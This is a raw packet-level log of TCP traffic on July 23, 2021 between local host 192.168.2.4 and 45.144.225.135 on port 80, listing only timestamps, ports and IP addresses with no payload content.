Jul 23, 2021 22:24:24.793579102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793582916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793600082 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793616056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793622017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793642044 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793647051 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793663979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793684959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793689966 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793708086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793720007 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793730974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793756008 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793760061 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793778896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793800116 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793801069 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793821096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793828011 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793842077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793854952 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793863058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793889046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793889046 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793911934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793916941 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793931961 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793940067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793952942 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793963909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793972969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.793982983 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.793992996 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794007063 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794013023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794028044 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794037104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794060946 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794083118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794086933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794096947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794101954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794110060 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794122934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794142962 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794163942 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794177055 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794195890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794213057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794217110 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794217110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794220924 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794224024 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794239998 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794240952 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794262886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794266939 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794281960 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794302940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794303894 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794325113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794348001 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794354916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794368982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794387102 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794390917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794416904 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794419050 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794439077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794445992 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794462919 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794470072 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794486046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794490099 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794506073 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794511080 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794526100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794533014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794545889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794553995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794565916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794576883 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794590950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794603109 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794614077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794635057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794645071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794656038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794677973 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794697046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794704914 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794713974 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794719934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794743061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794743061 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794766903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794787884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794807911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794827938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794847965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794851065 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794857979 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794862032 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794866085 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794867039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794869900 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794883966 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794889927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794912100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794935942 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794949055 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794955969 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.794958115 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.794981003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795001984 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795025110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795023918 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795047045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795068979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795072079 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795079947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795083046 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795084953 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795088053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795111895 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795161009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795181990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795202971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795222998 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795233965 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795243025 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795243025 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795245886 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795248985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795252085 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795263052 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795278072 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795285940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795308113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795310974 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795331955 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795332909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795352936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795373917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795387983 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795392036 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795393944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795412064 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795414925 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795437098 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795447111 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795459032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795475006 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795480967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795501947 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795505047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795526981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795543909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795551062 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795563936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795569897 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795587063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795605898 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795639038 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795696974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795717955 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795746088 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795783997 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795819044 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795890093 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795931101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795950890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795978069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.795986891 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.795999050 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796022892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796034098 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796045065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796066999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796077013 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796092033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796113968 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796123028 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796135902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796158075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796161890 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796181917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796186924 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796202898 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796219110 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796224117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796243906 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796253920 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796267986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796271086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796288967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796297073 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796312094 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796314955 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796334982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796355963 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796358109 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796364069 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796375990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796380043 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796396971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796417952 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796442986 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796467066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796487093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796506882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796526909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796546936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796567917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796569109 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796577930 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796581030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796583891 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796586990 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796588898 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796590090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796613932 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796637058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796658039 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796679020 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796695948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796720982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796744108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796765089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796787024 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796808004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796811104 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.796830893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796853065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.796998024 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.797851086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.801035881 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.801064968 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.801084995 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.801151991 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.803468943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.803491116 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.803546906 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.803771019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.803881884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.803915024 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.803926945 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.803980112 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.803980112 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.804016113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.804065943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.804085016 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.804147005 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.804181099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.804199934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.804214001 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.804246902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.804248095 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.804280043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.804325104 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.814412117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.814446926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.814472914 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.814495087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.814513922 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.814536095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.814549923 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.814557076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.814570904 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.814575911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.814591885 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.814596891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.814659119 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.826788902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.826822042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.826844931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.826869011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.826869965 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.826891899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.826894045 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.826919079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.826944113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.826963902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.826986074 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827008963 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827033043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827049017 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827055931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827059031 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827063084 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827079058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827105999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827120066 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827143908 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827193022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827299118 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827323914 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827348948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827369928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827395916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827410936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827420950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827435970 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827444077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827467918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827491045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827513933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827534914 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827545881 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827557087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827575922 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827598095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827598095 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827626944 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827754974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.827811003 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.827972889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828042030 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828063965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828089952 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828115940 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828135014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828157902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828164101 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828177929 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828181028 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.828182936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828206062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828227997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828252077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828277111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.828289986 CEST	49750	80	192.168.2.4	45.144.225.135
